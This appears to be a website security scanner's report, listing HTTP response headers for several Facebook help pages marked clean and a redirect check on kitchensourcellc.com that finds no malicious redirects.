http://www.facebook.com/help/292105707596942 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:28 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F292105707596942; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F292105707596942; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=cMmOU9yh5W49bHW_726JBUbG; expires=Fri, 03-Jun-2016 07:23:28 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 8Q7o10TdlzuM0Togfg47WamYG1VAJYDNrQ16nfu+Tog= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/help/292105707596942?_fb_noscript=1 | 200 OK Content-Length: 83706 Content-Type: text/html | clean |
http://www.facebook.com/help/393592270693739 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:29 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F393592270693739; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F393592270693739; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ccmOU8fH0_ppk884nLcFRd8c; expires=Fri, 03-Jun-2016 07:23:29 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: BA4GM3zXjuYWwj2upVVMIt4AFqcyNLKpNWHyC52+E0U= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/help/393592270693739?_fb_noscript=1 | 200 OK Content-Length: 46561 Content-Type: text/html | clean |
http://www.facebook.com/help/133234170146522 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:31 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F133234170146522; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F133234170146522; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=csmOUxRnV5945fctbRBqA9el; expires=Fri, 03-Jun-2016 07:23:30 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: TFOTa5EpyA5bxRvWLI3/6G4fq5TqEWnMwD+1Iw71NmQ= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/help/133234170146522?_fb_noscript=1 | 200 OK Content-Length: 44147 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kitchensourcellc.com
Result:
HTTP/1.1 200 OK
Date: Wed, 04 Jun 2014 07:23:06 GMT
Accept-Ranges: bytes
ETag: "7a5fcdf4226cd1:369"
Server: Microsoft-IIS/6.0
Content-Length: 96903
Content-Location: http://kitchensourcellc.com/index.htm
Content-Type: text/html
Last-Modified: Sun, 29 Apr 2012 20:01:33 GMT
X-Powered-By: ASP.NET
...96903 bytes of data.
GET / HTTP/1.1
Host: kitchensourcellc.com
Result:
HTTP/1.1 200 OK
Date: Wed, 04 Jun 2014 07:23:06 GMT
Accept-Ranges: bytes
ETag: "7a5fcdf4226cd1:369"
Server: Microsoft-IIS/6.0
Content-Length: 96903
Content-Location: http://kitchensourcellc.com/index.htm
Content-Type: text/html
Last-Modified: Sun, 29 Apr 2012 20:01:33 GMT
X-Powered-By: ASP.NET
...96903 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kitchensourcellc.com
Referer: http://www.google.com/search?q=kitchensourcellc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kitchensourcellc.com
Referer: http://www.google.com/search?q=kitchensourcellc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.